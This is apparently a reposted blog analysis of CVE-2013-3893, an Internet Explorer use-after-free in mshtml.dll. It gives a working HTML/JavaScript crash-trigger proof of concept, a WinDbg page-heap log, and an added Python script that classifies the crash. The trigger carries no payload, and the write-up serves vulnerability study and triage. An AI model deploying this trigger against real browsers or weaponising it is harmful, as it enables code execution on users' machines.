
CVE-2013-3893

Posted: 2016-08-22 23:15:56

Microsoft Internet Explorer Remote Code Execution Vulnerability (CNNVD-201309-304)

Internet Explorer (IE) is a web browser developed by Microsoft and shipped as the default browser of the Windows operating system.

A remote code execution vulnerability exists in the SetMouseCapture implementation in mshtml.dll in Microsoft IE versions 6 through 11. The flaw arises because the program accesses an object in memory that has already been freed or was never properly allocated. An attacker who lures a user into viewing a specially crafted website can use this flaw to execute arbitrary code in IE in the context of the current user and cause memory corruption. An attacker who successfully exploits the vulnerability gains the same user rights as the current user. If the current user is logged on with administrative rights, the attacker can take complete control of the affected system and could then install programs; view, change or delete data; or create new accounts with full user rights.

The PoC is as follows:

<html>
<script>
function trigger()
{
    // The Math.* calls are filler from the fuzzer-style PoC; their results are
    // discarded and they play no part in the bug.
    Math.tan(3,4);
    var id_0 = document.createElement("sup");
    var id_1 = document.createElement("audio");
    Math.sin(0);
    document.body.appendChild(id_0);
    document.body.appendChild(id_1);
    Math.cos(0);
    // Wrap id_0 inside id_1 so the two elements sit in one subtree.
    id_1.applyElement(id_0);
    Math.tan(3,4);
    // When id_0 loses mouse capture, document.write() tears down the current
    // markup (CDocument::write -> CMarkup::TearDownMarkup -> CTreeNode::Release
    // in the crash log below), freeing the node that SetMouseCapture still holds.
    id_0.onlosecapture=function(e) {
        document.write("");
    }
    Math.sin(0);
    // outerText must be indexed as a string key; a bare identifier here would
    // throw a ReferenceError before the capture calls are reached.
    id_0["outerText"]="";
    Math.cos(0);
    id_0.setCapture();
    Math.tan(3,4);
    // Moving capture to id_1 fires onlosecapture on id_0; mshtml then
    // dereferences the freed node (CDoc::HasContainerCapture in the log).
    id_1.setCapture();
    Math.sin(0);
}
window.onload = function() {
    trigger();
}
</script>
</html>

The program crashes as shown below, where the value in edi triggers the exception. Analysis shows that the value of edi is passed in from the calling function and points into a heap block that has already been freed. The debugging record follows.

1:021> g
(ed4.bd8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=041ce6c8 ecx=05e00680 edx=041ce400 esi=00000000 edi=074a9fb0
eip=656c1f60 esp=041ce618 ebp=041ce620 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
mshtml!CDoc::HasContainerCapture+0x14:
656c1f60 8b0f            mov     ecx,dword ptr [edi]  ds:0023:074a9fb0=????????
1:021> !heap -p -a edi
    address 074a9fb0 found in
    _DPH_HEAP_ROOT @ 1201000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    7392478:          74a9000             2000
    6b4890b2 verifier!AVrfDebugPageHeapFree+0x000000c2
    771e5674 ntdll!RtlDebugFreeHeap+0x0000002f
    771a7aca ntdll!RtlpFreeHeap+0x0000005d
    77172d68 ntdll!RtlFreeHeap+0x00000142
    75a5f1ac kernel32!HeapFree+0x00000014
    656be590 mshtml!CTreeNode::Release+0x0000002d
    656d15b1 mshtml!CMarkup::UnloadContents+0x00000380
    656d2a8a mshtml!CMarkup::TearDownMarkupHelper+0x00000055
    656d2a15 mshtml!CMarkup::TearDownMarkup+0x00000049
    655b3b5e mshtml!COmWindowProxy::SwitchMarkup+0x000005a0
    65502bb4 mshtml!CDocument::open+0x00000426
    65500789 mshtml!CDocument::write+0x0000007c
    655b3267 mshtml!Method_void_SAFEARRAYPVARIANTP+0x00000085
    656e235c mshtml!CBase::ContextInvokeEx+0x000005dc
    656e25d5 mshtml!CBase::InvokeEx+0x00000025
    656edf9a mshtml!DispatchInvokeCollection+0x0000014c
    656a4998 mshtml!CDocument::InvokeEx+0x000000f0
    65693148 mshtml!CBase::VersionedInvokeEx+0x00000020
    65693104 mshtml!PlainInvokeEx+0x000000eb
    6b4ea22a jscript!IDispatchExInvokeEx2+0x00000104
    6b4ea175 jscript!IDispatchExInvokeEx+0x0000006a
    6b4ea3f6 jscript!InvokeDispatchEx+0x00000098
    6b4ea4a0 jscript!VAR::InvokeByName+0x00000139
    6b4fd8c8 jscript!VAR::InvokeDispName+0x0000007d
    6b4fd96f jscript!VAR::InvokeByDispID+0x000000ce
    6b4fe3e7 jscript!CScriptRuntime::Run+0x00002b80
    6b4f5c9d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce
    6b4f5bfb jscript!ScrFncObj::Call+0x0000008d
    6b4f5e11 jscript!CSession::Execute+0x0000015f
    6b4ef3ee jscript!NameTbl::InvokeDef+0x000001b5
    6b4eea2e jscript!NameTbl::InvokeEx+0x0000012c
    65707af1 mshtml!CBase::InvokeDispatchWithThis+0x000001e1
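As an added triage example (not part of the original post), the following Python parses an excerpt of the WinDbg session above and confirms that the faulting read goes through a pointer into a freed page-heap block, naming the frame that freed it and the DOM API that drove the free. The regular expressions are assumptions about the shape of the WinDbg output shown on this page.

```python
import re
# Excerpt of the page-heap WinDbg session quoted above (constructed from the post).
WINDBG_LOG = """\
(ed4.bd8): Access violation - code c0000005 (first chance)
eax=00000000 ebx=041ce6c8 ecx=05e00680 edx=041ce400 esi=00000000 edi=074a9fb0
mshtml!CDoc::HasContainerCapture+0x14:
656c1f60 8b0f            mov     ecx,dword ptr [edi]  ds:0023:074a9fb0=????????
1:021> !heap -p -a edi
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    7392478:          74a9000             2000
    6b4890b2 verifier!AVrfDebugPageHeapFree+0x000000c2
    656be590 mshtml!CTreeNode::Release+0x0000002d
    656d2a15 mshtml!CMarkup::TearDownMarkup+0x00000049
    65500789 mshtml!CDocument::write+0x0000007c
"""

# The patterns below are assumptions about the shape of the WinDbg output above.
REG_RE = re.compile(r"\b(e[a-d]x|e[sd]i|e[bs]p|eip)=([0-9a-f]{8})")
FAULT_RE = re.compile(r"(\w+![\w:]+\+0x[0-9a-f]+):\n\s*[0-9a-f]+\s+[0-9a-f]+\s+(.+?)\s+ds:[0-9a-f]+:([0-9a-f]{8})=\?+")
BLOCK_RE = re.compile(r"in (free-ed|busy) allocation.*?\n\s*[0-9a-f]+:\s+([0-9a-f]+)\s+([0-9a-f]+)", re.S)
FRAME_RE = re.compile(r"^\s*[0-9a-f]{8}\s+(\w+![\w:]+)\+0x[0-9a-f]+$", re.M)

def parse_crash(log):
    fault = FAULT_RE.search(log)
    block = BLOCK_RE.search(log)
    base, size = (int(block.group(2), 16), int(block.group(3), 16)) if block else (0, 0)
    reg_used = re.search(r"\[(e[a-z]{2})\]", fault.group(2)) if fault else None
    return {
        "regs": {name: int(val, 16) for name, val in REG_RE.findall(log)},
        "fault_site": fault.group(1) if fault else None,
        "fault_addr": int(fault.group(3), 16) if fault else None,
        "pointer_reg": reg_used.group(1) if reg_used else None,   # register dereferenced
        "block_state": block.group(1) if block else None,
        "block_range": (base, base + size),
        "free_stack": FRAME_RE.findall(log),   # frames recorded when the block was freed
    }

def classify(info):
    """A read through a pointer into a freed page-heap block is a use-after-free."""
    lo, hi = info["block_range"]
    addr = info["fault_addr"]
    if info["block_state"] != "free-ed" or addr is None or not lo <= addr < hi:
        return {"verdict": "not a page-heap use-after-free"}
    return {
        "verdict": "use-after-free read",
        "pointer_matches_register": info["regs"].get(info["pointer_reg"]) == addr,
        "freed_by": next((f for f in info["free_stack"] if f.startswith("mshtml!")), None),
        "dom_api": next((f for f in info["free_stack"] if f.startswith("mshtml!CDocument::")), None),
    }
```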


Original: http://www.cnblogs.com/Ox9A82/p/5797123.html
